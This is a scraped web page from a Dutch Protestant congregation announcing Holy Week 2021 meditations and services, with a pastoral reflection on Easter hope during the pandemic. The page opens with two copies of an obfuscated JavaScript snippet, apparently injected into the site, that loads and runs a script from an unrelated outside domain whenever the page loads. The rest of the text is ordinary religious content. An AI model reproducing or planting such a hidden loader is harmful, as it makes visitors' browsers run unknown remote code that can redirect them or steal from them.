;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); #3 Jezus lijden leert ons Liefde | Stille week ... extra meditaties - PKN Damwâld

#3 Jezus lijden leert ons Liefde | Stille week … extra meditaties

Gepubliceerd op: vrijdag 26 maart 2021

In de komende week staan we stil bij het lijden en sterven van de Here Jezus voor ons. Vanouds is dat een week van gedenken van het grote heilsgeheim van ons geloof: Christus die zijn leven gaf voor ons. Op elke avond is er een overdenking of een dienst te volgen. Vooral op donderdag en vrijdag komt het heel dichtbij, als we eerst samen met Jezus en de discipelen aanzitten bij het Avondmaal, en dat ook daadwerkelijk vieren; ook dit keer kunt u ervoor kiezen zelf voor brood en wijn te zorgen, of het in gedachten mee te vieren. Op vrijdag staan we bij het kruis van Golgotha, waar Jezus leed en stierf. Het is belangrijk, dat we stilstaan bij de prijs die voor onze verlossing is betaald. Want het is ook voor ons gebeurd. Tegen de achtergrond van dit offer wordt het Pasen – ook het Paaslicht schijnt in de duisternis.

Op maandag-, dinsdag- en woensdagavond kunt u een meditatie zien die ds. Boukes, Robert Colijn en ds. G.J. Otter hebben opgenomen. De link vindt u via deze website en vanaf 18:30 uur is die te zien. Juist aan het begin van de avond kan dat de aandacht richten op Jezus’ lijden voor ons. Op Witte Donderdag zal – met als voorganger ds. Boukes –  in de dienst het Heilig Avondmaal gevierd worden. Thuis kunt u dit weer meevieren door wat wijn en wat brood klaar te leggen. Op Goede Vrijdag hoopt ds. G.J. Otter de dienst te leiden.

We zijn op weg naar het Paasfeest. Dat is een zekerheid, die wij als gelovigen hebben. Wat de wereld ons niet bieden kan (en de regering ook niet): zekerheid over het voorbijgaan van de kwaal die over de aarde gaat, biedt het geloof ons wel. We hebben reden om vol vertrouwen naar de toekomst te zien, zelfs als we zouden moeten sterven. Zoals Jezus de dood inging, en zijn leven in de handen legde van zijn Vader, ze leggen wij onze toekomst in de handen van God. We hadden aan het begin van het jaar de hoop, dat het in elk geval in april weer vrijer zou zijn. Maar nu het zo niet is: we wanhopen niet. We leven toe naar Pasen – het leven heeft door Christus het laatste woord.

#3 Jezus lijden leert ons Liefde

#2 Jezus lijden leert ons Hoop

 

#1 Jezus lijden leert ons volharding